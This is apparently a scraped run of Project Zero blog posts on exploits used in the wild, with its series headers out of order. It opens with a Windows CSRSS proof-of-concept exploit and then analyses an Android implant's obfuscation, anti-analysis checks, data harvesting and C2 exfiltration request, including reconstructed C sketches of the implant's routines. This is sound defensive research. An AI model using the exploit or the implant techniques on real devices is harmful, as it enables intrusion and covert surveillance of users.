f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;

typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,
                                                   PVOID CaptureBuffer,
                                                   ULONG ApiNumber,
                                                   ULONG DataLength);
f_CsrClientCallServer CsrClientCallServer;

typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,
                                                       PCSTR String,
                                                       ULONG Length,
                                                       ULONG MaximumLength,
                                                       PSTR OutputString);
f_CsrCaptureMessageString CsrCaptureMessageString;

NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,
                              PCWSTR String, ULONG Length = 0) {
  if (Length == 0) {
    Length = lstrlenW(String);
  }
  return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,
                                 Length * 2 + 2, OutputString);
}

int main() {
  HMODULE Ntdll = LoadLibrary(L"Ntdll.dll");
  CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(
      Ntdll, "CsrAllocateCaptureBuffer");
  CsrClientCallServer =
      (f_CsrClientCallServer)GetProcAddress(Ntdll, "CsrClientCallServer");
  CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(
      Ntdll, "CsrCaptureMessageString");

  char Message[0x220];
  memset(Message, 0, 0x220);
  PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);

  std::string Manifest = MANIFEST_CONTENTS;
  Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A');

  // There's no public definition of the relevant CSR_API_MSG structure.
  // The offsets and values are taken directly from the exploit.
  *(uint32_t*)(Message + 0x40) = 0xc1;
  *(uint16_t*)(Message + 0x44) = 9;
  *(uint16_t*)(Message + 0x59) = 0x201;

  // CSRSS loads the manifest contents from the client process memory;
  // therefore, it doesn't have to be stored in the capture buffer.
  *(const char**)(Message + 0x80) = Manifest.c_str();
  *(uint64_t*)(Message + 0x88) = Manifest.size();
  *(uint64_t*)(Message + 0xf0) = 1;

  CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);
  CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);
  CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);
  CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);

  // Triggers the issue by setting ApplicationName.MaxLength to a large value.
  *(uint16_t*)(Message + 0x122) = 0x8000;

  CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);
}
This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.
Published: 2021-01-12 17:37:00
Popularity: 16
Author: Ryan
This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.
Posted by Maddie Stone, Project Zero
A deep-dive into the implant used by a high-tier attacker against Android devices in 2020
This post covers what happens once the Android device has been successfully rooted by one of the exploits described in the previous post. What’s especially notable is that while the exploit chain only used known, and some quite old, n-day exploits, the subsequent code is extremely well-engineered and thorough. This leads us to believe that the choice to use n-days is likely not due to a lack of technical expertise.
This post describes what happens post-exploitation of the exploit chain. For this post, I will refer to different portions of the exploit chain as “stage X”. These stage numbers refer to:

Stage 1: the Chrome renderer exploit
Stage 2: the Android privilege escalation exploits
Stage 3: the post-exploitation downloader described in this post
Stage 4: the code that stage 3 downloads and executes
This post details stage 3, the code that runs post exploitation. Stage 3 is an ARM ELF file that expects to run as root. This stage 3 ELF is embedded in the stage 2 binary in the data section. Stage 3 is a downloader for stage 4.
As stated at the beginning, this stage, stage 3, is a very well-engineered piece of software. It is very thorough in its methods to hide its behavior and ensure that it is running on the correct targeted device. Stage 3 includes obfuscation, many anti-analysis checks, detailed logging, command and control (C2) server communications, and ultimately, the downloading and executing of Stage 4. Based on the size and modularity of the code, it seems likely that it was developed by a team rather than a single individual.
So let’s get into the fun!
Once stage 2 has successfully rooted the device and modified different security settings, it loads stage 3. Stage 3 is embedded in the data section of stage 2 and is 0x436C bytes in size. Stage 2 includes a variety of different methods to load the stage 3 ELF including writing it to /proc/self/mem. Once one of these methods is successful, execution transfers to stage 3.
This stage 3 ELF exports two functions: init and d. init is the function called by stage 2 to begin execution of stage 3. However, the main functionality for this binary is not in this function. Instead it is in two functions that are referenced by the ELF’s .init_array. The first function ensures that the environment variables PATH, ANDROID_DATA, and ANDROID_ROOT are set to expected values. The second function spawns a new thread that runs the heavy lifting of the behavior of the binary. The init function simply calls pthread_join on the thread spawned by the second function in the .init_array so it will wait for that thread to terminate.
In the newly spawned thread, the binary first cleans up from the previous stage by deleting most of the environment variables that stage 2 set. Then it will kill any process whose cmdline includes the word “knox”. Knox is a security platform that is built into Samsung devices.
Next, the code will check how often this binary has been running by reading a file that it drops on the device called state.parcel. The execution proceeds normally as long as it hasn’t been run more than 6 times on the current day. In other cases, execution changes as described in the state.parcel file section.
The binary will then iterate through the process’s open file descriptors 0-2 (usually stdin, stdout, and stderr) and point them to /dev/null. This prevents output messages from appearing that might lead a user or others to detect the presence of the exploit chain. The code will then iterate through any other open file descriptors (/proc/self/fd/) for the process and close any that include “pipe:” or “anon_inode:” in their symlinks. It will also close any file descriptors with a number greater than 32 that include “socket:” in the link, and any that don’t include /data/dalvik-cache/arm or /dev/ in the name. This may be to prevent debugging or to reduce accidental damage to the rest of the system.
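A rough approximation of this descriptor hygiene, written with standard POSIX APIs for illustration rather than as a byte-for-byte reconstruction:

#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static void scrub_fds(void) {
  // Silence stdin/stdout/stderr by pointing them at /dev/null.
  int devnull = open("/dev/null", O_RDWR);
  for (int fd = 0; fd <= 2; fd++) dup2(devnull, fd);

  // Walk /proc/self/fd and close descriptors matching the rules above.
  DIR *dir = opendir("/proc/self/fd");
  struct dirent *ent;
  char link[64], target[256];
  while (dir && (ent = readdir(dir))) {
    int fd = atoi(ent->d_name);
    if (fd <= 2 || fd == devnull || fd == dirfd(dir)) continue;
    snprintf(link, sizeof(link), "/proc/self/fd/%d", fd);
    ssize_t n = readlink(link, target, sizeof(target) - 1);
    if (n < 0) continue;
    target[n] = '\0';
    if (strstr(target, "pipe:") || strstr(target, "anon_inode:") ||
        (fd > 32 && strstr(target, "socket:")) ||
        (!strstr(target, "/data/dalvik-cache/arm") && !strstr(target, "/dev/")))
      close(fd);
  }
  if (dir) closedir(dir);
}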
The thread will then call into the function that includes significant functionality for the main behavior of the binary. It decrypts data, sets up configuration data, performs anti-analysis and debugging checks, and finally contacts the C2 server to download the next stage and executes it. This can be considered the main control loop for Stage 3.
The rest of this post explains the technical details of the Stage 3 binary’s behavior, categorized.
Stage 3 uses quite a few different layers of obfuscation to hide the behavior of the code. It uses a string obfuscation technique similar to stage 2’s. Another way that the binary obfuscates its behavior is through a hash table that stores dynamic configuration settings and status: instead of using a descriptive string for the “key”, it uses a series of 16 AES-decrypted bytes as the “keys” that are passed to the hashing function. The binary encrypts its static configuration settings, its communications with the C2, and the hash table itself with AES. The state.parcel file that is saved on the device is XOR encoded. The binary also includes multiple techniques to make it harder to understand its behavior using dynamic analysis: for example, it monitors what is mapped into the process’s memory, tracks which file descriptors it has opened, and sends very detailed information to the C2 server.
Similar to the previous stages, Stage 3 seems to be well engineered with a variety of different techniques to make it more difficult for an analyst to determine its behavior, either statically or dynamically. The rest of this section will detail some of the different techniques.
The vast majority of the strings within the binary are obfuscated. The obfuscation method is very similar to that used in previous stages. The obfuscated string is passed to a deobfuscation function prior to use. The obfuscated strings are designated by 0x7E7E7E (“~~~”) at the end of the string. To deobfuscate these strings, we used an IDAPython script using flare_emu that emulated the behavior of the deobfuscation function on each string.
A data block within the binary, containing important configuration settings, is encrypted using AES256. It is decrypted upon entrance to the main control function. The decrypted contents are written back to the same location in memory where the encrypted contents were. The code uses OpenSSL to perform the AES256 decryption. The key and the IV are hardcoded into the binary.
Whenever this blog post refers to the “decrypted data block”, we mean this block of memory. The decrypted data includes things such as the C2 server url, the user-agent to use when contacting the C2 server, version information and more. Prior to returning from the main control function, the code will overwrite the decrypted data block to all zeros. This makes it more difficult for an analyst to dump the decrypted memory.
Once the decryption is completed, the code double checks that decryption was successful by looking at certain bytes and verifying their values. If any of these checks fail, the binary will not proceed with contacting the C2 server and downloading stage 4.
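The post doesn’t name the exact cipher mode, so the following in-place decryption sketch assumes AES-256-CBC via OpenSSL’s EVP interface; the key and IV parameters stand in for the hardcoded values:

#include <openssl/evp.h>
#include <stdlib.h>
#include <string.h>

// Sketch: decrypt a data block in place; before returning, stage 3 similarly
// overwrites the plaintext with zeros. CBC mode is an assumption.
int decrypt_block_in_place(unsigned char *buf, int len,
                           const unsigned char key[32],
                           const unsigned char iv[16]) {
  EVP_CIPHER_CTX *ctx = EVP_CIPHER_CTX_new();
  unsigned char *plain = malloc((size_t)len + 16);  // room for the final block
  int out1 = 0, out2 = 0, ok = -1;
  if (ctx && plain &&
      EVP_DecryptInit_ex(ctx, EVP_aes_256_cbc(), NULL, key, iv) == 1 &&
      EVP_DecryptUpdate(ctx, plain, &out1, buf, len) == 1 &&
      EVP_DecryptFinal_ex(ctx, plain + out1, &out2) == 1) {
    memcpy(buf, plain, out1 + out2);  // write plaintext back over ciphertext
    ok = out1 + out2;
  }
  if (plain) { memset(plain, 0, (size_t)len + 16); free(plain); }
  EVP_CIPHER_CTX_free(ctx);
  return ok;
}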
Another block of data that is 0x140 bytes long is then decrypted in the same way. This decrypted data doesn’t include any human-readable strings, but is instead used as “keys” for a hash table that stores configuration settings and status information. We’ll call this area the “decrypted keys block”. The information that is stored in the hash table can change whereas the configuration settings in the decrypted data block above are expected to stay the same throughout execution. The decrypted keys block, which serves as the hash table keys, is shown below.
00000000: 9669 d307 1994 4529 7b07 183e 1e0c 6225  .i....E){..>..b%
00000010: 335f 0f6e 3e41 1eca 1537 3552 188f 932d  3_.n>A...75R...-
00000020: 4bf4 79a4 c5fd 0408 49f4 b412 3fa3 ad23  K.y.....I...?..#
00000030: 837b 5af1 2862 15d9 be29 fd62 605c 6aca  .{Z.(b...).b`\j.
00000040: ad5a dd9c 4548 ca3a 7683 5753 7fb9 970a  .Z..EH.:v.WS....
00000050: fe71 a43d 78b1 72f5 c8d4 b8a4 0c9e 925c  .q.=x.r........\
00000060: d068 f985 2446 136c 5cb0 d155 ad8d 448e  .h..$F.l\..U..D.
00000070: 9307 54ba fc2d 8b72 ba4d 63b8 3109 67c9  ..T..-.r.Mc.1.g.
00000080: e001 77e2 99e8 add2 2f45 1504 557f 9177  ..w...../E..U..w
00000090: 9950 9f98 91e6 551b 6557 9c62 fea8 afef  .P....U.eW.b....
000000a0: 18b8 8043 9071 0f10 38aa e881 9e84 e541  ...C.q..8......A
000000b0: 3fa0 4697 187f fb47 bbe4 6a76 fa4b 5875  ?.F....G..jv.KXu
000000c0: 04d1 2861 6318 69bd 7459 b48c b541 3323  ..(ac.i.tY...A3#
000000d0: 16cd c514 5c7f db99 96d9 5982 f6f1 88ee  ....\.....Y.....
000000e0: f830 fb10 8192 2fea a308 9998 2e0c b798  .0..../.........
000000f0: 367f 7dde 0c95 8c38 8cf3 4dcd acc4 3cd3  6.}....8..M...<.
00000100: 4473 9877 10c8 68e0 1673 b0ad d9cd 085d  Ds.w..h..s.....]
00000110: ab1c ad6f 049d d2d4 65d0 1905 c640 9f61  ...o....e....@.a
00000120: 1357 eb9a 3238 74bf ea2d 97e4 a747 d7b6  .W..28t..-...G..
00000130: fd6d 8493 2429 899d c05d 5b94 0096 4593  .m..$)...][...E.
The binary uses this hash table to keep track of important values such as for status and configuration. The code initializes a CRC table which is used in the hashing algorithm and then the hash table is initialized. The structure that manages the hashtable shown below:
struct hashtable_mgr {
  int* hashtable_ptr;
  int maxEntries;
  int numEntries;
};
The first member of this struct points to the hash table which is allocated on the heap and has size 0x1400 bytes when it’s first initialized. The hash table uses sets of 0x10 bytes from the decrypted keys block as the key that gets passed to the hashing function.
There are two main functions that are used to interact with this hashtable throughout the binary: we’ll call them getValueFromHashtable and putValueInHashtable. Both functions take four arguments: pointer to the hashtable manager, pointer to the key (usually represented as an offset from the beginning of the decrypted keys block), a pointer for the value, and an int for the value length. Through the rest of this post, I will refer to values that are stored in the hash table. Because the key is a series of 0x10 bytes, I will refer to values as “the value for offset 0x20 in the hash table”. This means the value that is stored in the hashtable for the “key” that is 0x10 bytes and begins at the address of the start of the decrypted keys block + 0x20.
Each entry in the hashtable has the following structure.
struct hashtable_entry {
  BYTE* key_ptr;
  uint key_len;
  uint in_use;
  BYTE* value_ptr;
  uint value_len;
};
I have documented the majority of the entries in the hashtable here. I use the key’s offset from the beginning of the decrypted keys block as the “key” instead of typing out the series of 0x10 bytes. As shown in the linked sheet, the hashtable contains the dynamic variables that stage 3 needs to keep track of. For example, the filename where to save stage 4 and the install and failure counts.
The hashtable is periodically written to a file named uierrors.txt as described in the Persistence section. This is to save state in case the process exits.
The whole exploit chain diligently cleans up after itself to leave as few indicators as possible of its presence. However, stage 3 does save a couple of files and adds environment variables in order to function. This is in addition to the stage 4 code which will be discussed in the “Executing the Next Stage” section. Each of the files and variables described in this section will be deleted as soon as they’re no longer needed, but they will be on a device for at least a period of time. For each of the files that are saved to the device, the directory path is often randomly selected from a set of potential paths. This makes it more time consuming for an analyst to detect the presence of the file on a device because the analyst would have to check 5 different paths for each file rather than 1.
During startup, the code will record the current time in a file named state.parcel. After it records the current time at the beginning of the file, it will then check how many times per day this has been done by reading all of the times currently in the file. If there are fewer than 6 entries for the current day, the code proceeds. If there are 6 entries in the file from the current day and there are at least 5 entries for each of the previous 3 days, the binary will set a variable that will tell the code to clean up and exit. If there are 6 entries for the current day and there’s at least one entry for each of the past 3 days, the binary will clean up the persistent files for both this and other stages and then do a max sleep: sleep(0xFFFFFFFF), the equivalent of sleeping for over 136 years.
If the effective UID is 0 (root), then the code will randomly choose one of the following paths to write the file to:
If the effective UID is not 0, then the state.parcel file will be written to whatever directory the binary is executing out of according to /proc/self/exe. The contents in state.parcel are obfuscated by XOR’ing each entry with 0xFF12EE34.
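Since XOR with a constant is its own inverse, a single routine both encodes and decodes the file. A sketch, assuming each entry is stored as a 32-bit value:

#include <stddef.h>
#include <stdint.h>

// Encode/decode state.parcel entries: XOR'ing twice with the same constant
// restores the original data. The 32-bit entry width is an assumption.
void xor_parcel_entries(uint32_t *entries, size_t count) {
  for (size_t i = 0; i < count; i++)
    entries[i] ^= 0xFF12EE34;
}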
Stage 3 periodically writes the hash table that contains configuration and status information to a file named uierrors.txt. The code uses the same process as for state.parcel to decide which directory to write the file to.
Whenever the hashtable is written to uierrors.txt it is encrypted using AES256. The key is the same AES key used to decrypt the configuration settings data block, but it generates a set of 0x10 random bytes to use as the IV. The IV is written to the uierrors.txt file first and then is followed by the encrypted hash table contents. The CRC32 of the encrypted contents of the file is written to the file as the last 4 bytes.
On start-up, stage 3 will remove the majority of the environment variables set by the previous stage. It then sets its own new environment variables.
Environment Variable Name | Value |
abc | Address of the decryption data block |
def | Address of the function that will send logging messages to the C2 server |
def2 | Address of the function that adds logging messages to the error and/or informational logging message queues |
ghi | Points to the decrypted block of hashtable keys
ddd | Address of the function that performs inflate (decompress) |
ccc | Address of the function that performs deflate (compress) |
0x10 bytes at 0x228CC | ??? |
0x10 bytes at 0x228DC | Pointer to the string representation of the hex_d_uuid |
0x10 bytes at 0x228F0 | Pointer to the C2 domain URL |
0x10 bytes at 0x22904 | Pointer to the port string for the C2 server |
0x10 bytes at 0x22918 | Pointer to the beginning of the certificate |
0x10 bytes at 0x2292C | 0x1000 |
0x10 bytes at 0x22940 | Pointer to +4AA in decrypted data block |
0x10 bytes at 0x22954 | 0x14 |
0x10 bytes at 0x22698 | Pointer to the user-agent string |
PPR | Selinux status such as “selinux-init-read-fail” or “selinux-no-mdm” |
PPMM | Set if there is no “persist.security.mdm.policy” string in /init |
PPQQ | Set if the “persist.security.mdm.policy” string is in /init |
The binary has a very detailed and mature logging mechanism. It tracks both “error” and “informational” logging messages. These messages are saved until they’re sent to the C2 server either when stage 3 is automatically reaching out to the C2 server, or “on-demand” by calling the subroutine that is saved as environment variable “def”. The subroutine saved as environment variable “def2”, adds messages to the error and/or informational message queues. There are hundreds of different logging messages throughout the binary. I have documented the meaning of some of the different logging codes here.
This code is very diligent about covering its tracks, both while it’s running and once it finishes. While it’s running, the binary forks a new process that is responsible for cleaning up logs while the other code is executing. This other process does the following to clean up stage 3’s tracks:
There are also a couple of different functions that clean up all potential dropped files from both this stage and other stages and remove the set environment variables.
The whole point of this binary is to download the next stage from the command and control (C2) server. Once the previous unpacking steps and checks are completed, the binary will begin preparing the network communications. First the binary will perform a DNS test, then gather device information, and send the POST request to the C2 server. If all these steps are successful, it will receive back the next stage and prepare to execute that.
Prior to reaching out to the C2 server, the binary performs a DNS test. It takes a pointer to the decrypted data block as its argument. First the function generates a random hostname that is between 8-16 lowercase latin characters. It then calls getaddrinfo on this random hostname. It’s trying to find a host that will cause getaddrinfo to return EAI_NODATA, meaning that no address information could be found for that host. It will attempt 3 different addresses before it will bail if none of them return EAI_NODATA. Some disconnected analysis sandboxes will respond to all hostnames and so the code is trying to detect this type of malware analysis environment.
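A sketch of that check, assuming glibc/bionic’s getaddrinfo (on glibc, EAI_NODATA requires _GNU_SOURCE); the character set, hostname length, and retry count follow the description above, and seeding of rand() is omitted:

#define _GNU_SOURCE  // for EAI_NODATA on glibc; bionic defines it by default
#include <netdb.h>
#include <stdlib.h>

// Returns 1 if a randomly generated hostname fails to resolve with
// EAI_NODATA (the resolver looks genuine); 0 if every attempt resolves,
// which suggests an analysis sandbox that answers all DNS queries.
static int dns_environment_looks_real(void) {
  for (int attempt = 0; attempt < 3; attempt++) {
    char host[17];
    int len = 8 + rand() % 9;                 // 8-16 lowercase latin characters
    for (int i = 0; i < len; i++) host[i] = 'a' + rand() % 26;
    host[len] = '\0';
    struct addrinfo *res = NULL;
    int rc = getaddrinfo(host, NULL, NULL, &res);
    if (res) freeaddrinfo(res);
    if (rc == EAI_NODATA) return 1;
  }
  return 0;
}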
Once it finds a hostname that returns EAI_NODATA, stage 3 does a DNS query with that hostname. The DNS server address is found in the decrypted block in argument 1 at offset 0x14C7. In this binary that is 8.8.8.8:53, the Google DNS server. The code will connect to the DNS server via a socket and then send a Type A query for the randomly generated host name and parse the response. The only acceptable response from the server is NXDomain, meaning “Non-Existent Domain”. If the code receives back NXDomain from the DNS server, it will proceed with the code path that communicates with the C2 Server.
The C2 server hostname and port is read from the decrypted data block. The port number is at offset 0x84 and the hostname is at offset 0x4.
The binary first connects via a socket to the C2 server, then connects with SSL/TLS. The SSL/TLS certificate, a root certificate, is also in the decrypted data block at offset 0x4C7. The binary uses the OpenSSL library.
Once it successfully connects to the C2 server via SSL/TLS, the binary will then begin collecting all the device information that it would like to send to the C2 server. The code collects A LOT of data to be sent to the C2 server. Six different sets of information are collected, formatted, compressed, and encrypted prior to sending to the remote server. The different “sets” of data that are collected are:
For this set, the binary is collecting device characteristics such as the Android version, the serial number, model, battery temperature, st_mode of /dev/mem and /dev/kmem, the contents of /proc/net/arp and /proc/net/route, and more. The full list of device characteristics that are collected and sent to the server are documented here.
The binary uses a few different methods for collecting this data. The most common is to read system properties. They have 2 different ways to read system properties:
To get the device ID, subscriber ID, and MSISDN, the binary uses the service call shell command. To call a function from a service using this API, you need to know the code for the function: the code is simply the position at which the function is listed in the service’s AIDL file, which means it can change with each new Android release. The developers of this binary hardcoded the service code for each Android SDK version from 8 (Froyo) through 29 (Android 10). For example, the getSubscriberId code in the iphonesubinfo service is 3 for Android SDK versions 8-20, 5 for SDK version 21, and 7 for SDK versions 22-29.
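A sketch of such a version table for the getSubscriberId example, using the codes quoted above; other functions and services would be handled analogously:

#include <stdio.h>

// Returns the iphonesubinfo transaction code for getSubscriberId on a given
// Android SDK version, mirroring the hardcoded table described above.
static int subscriber_id_code(int sdk) {
  if (sdk >= 8 && sdk <= 20) return 3;
  if (sdk == 21) return 5;
  if (sdk >= 22 && sdk <= 29) return 7;
  return -1;  // SDK version not supported by the binary
}

// The code is then used to build a "service call" shell command, e.g.
// "service call iphonesubinfo 7" on Android 10.
static void build_command(char *cmd, size_t size, int sdk) {
  snprintf(cmd, size, "service call iphonesubinfo %d",
           subscriber_id_code(sdk));
}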
The code also collects detailed networking information. For example, it collects the MAC address and IP address for each interface listed under the /sys/class/net/ directory.
To collect information about the applications installed on the device, the binary will send all of the contents of /data/system/packages.xml to the C2 server. This XML file includes data about both the user-installed and the system-installed packages on the device.
To gather information about the physical location of the device, the binary runs dumpsys location in a shell. It sends the full output of this data back to the C2 server. The output of the dumpsys location command includes data such as the last known GPS locations.
The binary collects information about the status of the exploits and subsequent stages (including this one) to send back to the C2 server. Most of these values are obtained from the hash storage table. There are 22 value pairs that are sent back to the server. These values include things such as the installation time and the “repair count”, the build id, and the major and minor version numbers for the binary. The full set of data that is sent to the C2 server is available here.
The binary sends information about every single running process back to the C2 server. It will iterate through each directory under /proc/ and send back the following information for each process:
As described in the Error Processing section, whenever the binary encounters an error, it creates an error message. The binary will send a maximum of 0x1F of these error messages back to the C2 server. It will also send a maximum of 0x1F “informational” messages back to the server. “Info” messages are similar to the error messages except that they document a condition less severe than an error; the severity distinction is the developers’ own.
Once all of the “sets” of information are collected, they are compressed using the deflate function. The compressed “messages” each have the following compressedMessage structure. The messageCode is a type of identification code for the information that is contained in the message. It’s calculated by taking the crc32 value of the 0x10 bytes at offset 0x1CD8 in the decrypted data block and then adding the “identification code”.
struct compressedMessage {
  uint compressedDataLength;
  uint uncompressedDataLength;
  uint messageCode;
  BYTE* dataPointer;
  BYTE data[4096];
};
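A sketch of building one such message; using zlib’s one-shot compress() (which wraps deflate) and the uint32_t field widths are assumptions, and the messageCode derivation follows the description above:

#include <stdint.h>
#include <zlib.h>

struct compressed_message {
  uint32_t compressedDataLength;
  uint32_t uncompressedDataLength;
  uint32_t messageCode;
  uint8_t *dataPointer;
  uint8_t data[4096];
};

int build_message(struct compressed_message *msg, const uint8_t *src,
                  uint32_t src_len, uint32_t id_code, uint32_t base_crc32) {
  uLongf dst_len = sizeof(msg->data);
  if (compress(msg->data, &dst_len, src, src_len) != Z_OK) return -1;
  msg->compressedDataLength = (uint32_t)dst_len;
  msg->uncompressedDataLength = src_len;
  msg->messageCode = base_crc32 + id_code;  // crc32 of the 0x10 bytes + code
  msg->dataPointer = msg->data;
  return 0;
}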
Once each of the messages, or sets of data, have been individually compressed into the compressedMessage struct, the byte order is swapped to change the endianness and then the data is all encrypted using AES256. The key from the decrypted data block is used and the IV is a set of 0x10 random bytes. The IV is prepended to the beginning of the encrypted message.
The data is sent to the server as a POST request. The full header is shown below.
POST /api2/v9/pass HTTP/1.1
User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G600FY Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.3
Host: REDACTED:443
Connection: keep-alive
Content-Type:application/octet-stream
Content-Length:%u
Cookie: %s
The “Cookie” field holds two values from the decrypted data block, sid and uid, both of which are base64-encoded.
The body of the POST request is all of the data collected and compressed in the section above. This request is then sent to the C2 server via the SSL/TLS connection.
The response received back from the server is parsed. If the HTTP Response Code is not 200, it’s considered an error. The received data is first decrypted using AES256. The key used is the key that is included in the decrypted data block at offset 0x48A and the IV is sent back as the first 0x10 bytes of the response. After being decrypted, the byte order is swapped using bswap32 and the data is then decompressed using inflate. This inflated response body is an executable file or a series of commands.
The binary will also store and delete cookies for the C2 server domain and the exploit server domain. First, the binary will delete the cookie for the hostname of the exploit server that is the following name/value pair: session=<XXX>. This name/value is hardcoded into the decrypted data block within the binary. Then it will re-add that same cookie, but with an updated last accessed time and expire time.
As stated previously, stage 3’s role in the exploit chain is to check that the binary is not being analyzed and if not, collect detailed device data and send it to the C2 server to receive back the next stage of code and commands that should be executed. The detailed information that is sent back to the C2 server is likely used for high-fidelity targeting.
The developers of stage 3 purposefully built in a variety of different ways that the next stage of code can be executed: a series of commands passed to system, a shared library ELF file executed by calling dlopen and dlsym, and more. This section will detail the different ways that the C2 server can instruct stage 3 to save and begin executing the next stage of code.
If the POST request to the C2 server is successful, the code will receive back either an executable file or a set of commands, which it’ll “process”. The response is parsed differently based on the “message code” in the header of the response. This “message code” is similar to what was described in the “Constructing the Request” section: an identification code plus the CRC32 of the 0x10 bytes at 0x25E30. When processing the response, the binary calculates the CRC32 of these bytes again and subtracts it from the message code. This value is then used to determine how to treat the contents of the response. The majority of the message codes distinguish different ways for the response to be saved to the device and then executed.
There are a few functions that are commonly used by multiple message codes, so they are described here first.
func1 - Writes the response contents to files in both the /data/dalvik-cache/arm and /mnt directories.
This function does the following:
func2 - Fork child process and inject code using ptrace.
This function forks a new process where the child will call the function init from an ELF library, then the parent will inject the code from the response into the child process using ptrace. The ELF library that is opened with dlopen (and whose init is then called) is named /system/bin/%016lx%016lx, with both values being the address of the buffer pointer.
func3 - Writes the buffer of the reply contents to file and sets the permissions and SELinux attributes.
This function will write the buffer to either the file path provided in the third argument, or to a newly generated path: the code walks a list of candidate directories beginning with /cache and, in the first directory that it can stat, creates the temporary file using mkstemp(“%s/XXXXXX”).
After the new file is created, the code sets the permissions on the file path to those supplied to the function as the fourth argument. Then it will set the SELinux attributes of the file to those passed in in the fifth argument.
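A sketch of func3’s file-drop behavior using standard Linux APIs; the directory is simply passed in here, whereas the real function walks the preference-ordered list described above:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <unistd.h>

int drop_file(const char *dir, const void *buf, size_t len, mode_t mode,
              const char *selinux_ctx) {
  char path[256];
  snprintf(path, sizeof(path), "%s/XXXXXX", dir);
  int fd = mkstemp(path);                   // creates the temporary file
  if (fd < 0) return -1;
  if (write(fd, buf, len) != (ssize_t)len) { close(fd); return -1; }
  fchmod(fd, mode);                         // permissions from the 4th argument
  // SELinux attributes from the 5th argument:
  setxattr(path, "security.selinux", selinux_ctx, strlen(selinux_ctx) + 1, 0);
  close(fd);
  return 0;
}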
The following section gives a simplified summary of how the response from the C2 server is handled based on the response’s message code:
That concludes our analysis of Stage 3 in the Android exploit chain. We hypothesize that each Stage 2 (and thus Stage 3) includes different configuration variables that would allow the attackers to identify which delivered exploit chain is calling back to the C2 server. In addition, due to the detailed information sent to the C2 prior to stage 4 being returned to the device it seems unlikely that we would successfully determine the correct values to have a “legitimate” stage 4 returned to us.
It’s especially fascinating how complex and well-engineered this stage 3 code is when you consider that the attackers used only publicly known n-days in stage 2. The attackers used a Google Chrome 0-day in stage 1, public n-day exploits for Android in stage 2, and a mature, complex, and thoroughly designed and engineered stage 3. This leads us to believe that the actor likely has more device-specific 0-day exploits.
This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 6: Windows Exploits.
Published: 2021-01-12 17:37:00
Popularity: 21
Author: Ryan
This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.
Posted by Mark Brand, Project Zero
A survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020
After one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we've got through that, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array which will register it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework:
Each of the "xyz_register" functions follows the same pattern: it adds an entry to the global list with a probe function, used to check whether the device is vulnerable to the given exploit and to estimate the likelihood of success, and an exploit function, used to launch the exploit. These probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device.
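A hypothetical reconstruction of that registration pattern looks roughly like this; every name below is invented for illustration:

// Sketch of a plug-and-play exploit registry driven by .init_array.
struct priv_esc {
  const char *name;          // internal exploit name, e.g. "iovy" or "0820"
  int (*probe)(void);        // is this device vulnerable? how likely is success?
  int (*exploit)(void);      // actually launch the exploit
  struct priv_esc *next;
};

static struct priv_esc *g_exploit_list;

static int iovy_probe(void)   { /* inspect kernel version, device model, ... */ return 0; }
static int iovy_exploit(void) { /* trigger the bug */ return -1; }

static struct priv_esc iovy_entry = {"iovy", iovy_probe, iovy_exploit, 0};

// The constructor attribute places this in .init_array, so registration
// happens automatically when the binary is loaded.
__attribute__((constructor)) static void iovy_register(void) {
  iovy_entry.next = g_exploit_list;
  g_exploit_list = &iovy_entry;
}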
Looking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal "name" describing the exploit, and those map very neatly to either public naming ("iovy", "cow") or CVE numbers ("0569", "0820" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.
In addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.
Of course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.
Anyway, without further ado let's take a look at the exploits they did fit in here!
